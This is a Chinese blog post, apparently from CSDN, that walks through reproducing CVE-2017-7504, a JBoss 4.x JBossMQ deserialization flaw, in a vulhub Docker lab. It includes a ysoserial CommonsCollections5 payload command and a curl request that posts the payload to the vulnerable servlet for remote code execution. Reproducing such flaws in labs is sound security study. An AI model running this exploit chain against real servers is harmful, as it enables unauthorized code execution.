JBoss反序列化漏洞复现 CVE-2017-7504

于 2024-09-11 21:10:38 发布
阅读量122 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62284238/article/details/142149561
版权

1.准备:

1.1复现环境

漏洞环境:vulnhub靶场

工具准备:ysoserial

1.2环境启动

进入vulnhub目录下的jboss目录,进入CVE-2017-7504目录

cd /home/hbesljx/vulhub/jboss/CVE-2017-7504

docker-compoe启动漏洞环境

docker-compose up -d

访问靶机的8080端口。出现如下即为开启成功!

2.概念说明

JBoss什么

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。

3.漏洞原理

JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

4.漏洞复现

4.1 ysoserial生成payload

ysoserial语法:

java -jar ysoserial.jar [选择利用链] [commands]
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "touch /tmp/success" > 1.ser

4.2 将1.ser文件内容作为POST Body发送

curl http://192.168.133.140:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @1.ser

4.3 查看靶场的目录

docker compose exec jboss bash
cd tmp/
ls

上传成功!

唔熙迪熙
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
weixin_54626591的博客
05-06 194
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
漏洞复现Jboss反序列化漏洞CVE-2017-12149)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 870
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
JBoss反序列漏洞CVE-2017-7504
weixin_46411728的博客
09-05 1471
JBoss反序列漏洞CVE-2017-7504
【Vulhub】CVE-2017-7504 JBOSS反序列化漏洞复现
看不尽的尘埃——博客
02-07 9011
环境 目标(Kali):http://192.168.0.11:8080/ 操作机(Paroot):192.168.0.131     过程 CVE-2017-12149和CVE-2017-7504都是反序列化漏洞,因此用的东西都是一样的,笔者这里使用上次复现CVE-2017-12149的时候的POC文件。 笔者还特别查了下两种区别: CVE-2017-7504 影响范围...
漏洞复现JBoss反序列化漏洞(CVE-2017-12149)
cj_Hydra's Blog
05-18 2592
前言: JBoss 反序列化漏洞,该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。但近期有安全研究者发现JBossAS 6.x也受该漏洞影响,恶意访问者利用该漏洞无需用户验证即可获得服务器的控制权。该漏洞的细节和验证代码已公开,为避免造成损失,建议及时修复升级至JBossAS 7版本 影响版本:
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504 已亲自复现
qq_42430287的博客
12-19 1239
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504 已亲自复现
JBossMQJMS 反序列化漏洞CVE-2017-7504
懂进攻知防守
07-23 949
CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java ⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码。...
JBossMQ JMS 反序列化漏洞CVE-2017-7504
weixin_51151498的博客
12-12 773
JBossMQ JMS 反序列化漏洞CVE-2017-7504
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
yang1234567898的博客
04-22 1636
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 漏洞复现 启动环境 docker-compose up -d 该漏洞出现在/jbossmq-httpil/HTTPServerI.
Jboss反序列化漏洞CVE-2017-12149复现
weixin_43736941的博客
07-24 444
Jboss反序列化漏洞CVE-2017-12149复现 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。漏洞危害程度为高危(High)。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
Save OpenAI response in Azure function to Blob storage
suiusoar
09-06 1272
将 OpenAI 的响应保存在 Azure 函数中到 Blob 存储
微信小程序npm扩展能力探究
曹定栓的博客
09-04 1395
小程序支持使用 npm 安装第三方包。
JavaScript前端面试题——深拷贝及浅拷贝
lbcbjtlhmjq的博客
09-05 854
深拷贝和浅拷贝是复制数据结构的两种不同方式。浅拷贝是指创建一个新对象,但仅复制原对象的属性引用,而不是其属性值。即,如果原对象的属性值是对象或数组,浅拷贝后的新对象会引用相同的内存地址,因此修改内层对象会影响到原对象。(简单数据类型拷贝值,引用数据类型拷贝地址)深拷贝是创建一个新的对象,并复制原始对象的所有属性,包括嵌套的对象和数组。这意味着在原始对象或新对象上的更改不会相互影响。
深入解析Go语言中的条件控制与数据处理
一个被知识诅咒的人
09-08 1091
本文详细介绍了Go语言中的switch语句及其在正则表达式匹配中的应用,探讨了如何通过math/big包进行高精度圆周率计算。此外,文章还展示了如何实现一个简易键值对存储系统,并通过encoding/json和encoding/xml包处理常见的JSON和XML数据格式。通过这些示例和知识点,读者将能掌握Go语言中条件控制和数据处理的高级应用,提升编写高效代码的能力。
京东获得JD商品详情 API 返回值说明||京东商品详情数据采集API接口详解
电商数据Girl的博客
09-07 352
请求参数:num_iid=10335871600。参数说明:num_iid:JD商品ID。
Jmeter_循环获取请求接口的字段,并写入文件
ramsey17的博客
09-09 480
这里如果使用${__V(mid_${__counter(,)},)}的话,第一个循环(1-20)正常,第二个循环,counter从21开始,因mid不存在而接口请求失败,所以需要使用${__V(mid_${count},)};通过JSON提取器、计数器、beanshell,循环读取邮箱接口的返回字段,筛选出flag为3的收件人,并写入csv文件。10、beanshell处理返回的数据,首先将json转换,获取flag为3的收件人,并写入csv文件;4、配置计数器,与循环控制器一起,起到翻页的作用;
python之异步任务
点点滴滴
09-08 963
在 Python 中,异步任务通常通过使用库如 来实现。 是一个简单、灵活且可靠的分布式系统,用于处理大量消息,同时提供操作控制。在 中, 和 是两种常用的方法来调度异步任务。 是 提供的一个快捷方法,用于简化任务的调用。它会自动将任务标记为异步执行。 方法 提供了更多的控制选项,例如可以指定任务的执行时间、重试策略等。 参数说明 :任务的参数,通常以元组形式传递。 :任务的关键字参数,以字典形式传递。 :任务延迟执行的时间(以秒为单位)。 :任务的预计执行时间(datetime 对象)。 :
Unexpected token ‘o‘, “[object Obj“... is not valid JSON 报错原因解释
最新发布
weixin_73077230的博客
09-10 198
在开发时使用到JSON.parse报错,不过第一次不会报错,解释一下原因:JSON.parse()用于从一个字符串中解析出json对象,举个例子: 报错的原因: 因为你转换的数据本来就是object,JSON.parse()这个方法是把一个字符串解析出json对象,你再转换就会报错;在使用时可以进行类型判断typeof,条件为真在进行转换,为假时不进行转换
CVE-2017-7504
07-28
CVE-2017-7504是指JBoss AS 4.x及之前版本中的一个反序列化漏洞,该漏洞存在于JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件中。攻击者可以利用特制的序列化数据利用该漏洞执行任意代码。与CVE-2015-7501漏洞原理相似,但利用的路径不同,CVE-2017-7504出现在/jbossmq-httpil/HTTPServerILServlet路径下。\[1\] 要利用CVE-2017-7504漏洞,可以按照以下步骤进行操作: 1. 访问靶场环境。 2. 使用CVE-2017-12149的工具和脚本在攻击机上执行命令,生成poc(详情请参考相关文章)\[2\]。 3. 在另一个终端上监听端口。 4. 在第一个终端上执行命令,生成成功\[3\]。 请注意,这只是一种利用CVE-2017-7504漏洞的方法,具体操作可能因环境和工具而异。 #### 引用[.reference_title] - *1* [JBossMQ JMS 反序列化漏洞CVE-2017-7504)](https://blog.csdn.net/weixin_51151498/article/details/128283378)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[Vulfocus解题系列] jboss 反序列化CVE-2017-7504)](https://blog.csdn.net/qq_45813980/article/details/118653639)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [JBoss反序列漏洞CVE-2017-7504)](https://blog.csdn.net/weixin_46411728/article/details/126714312)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值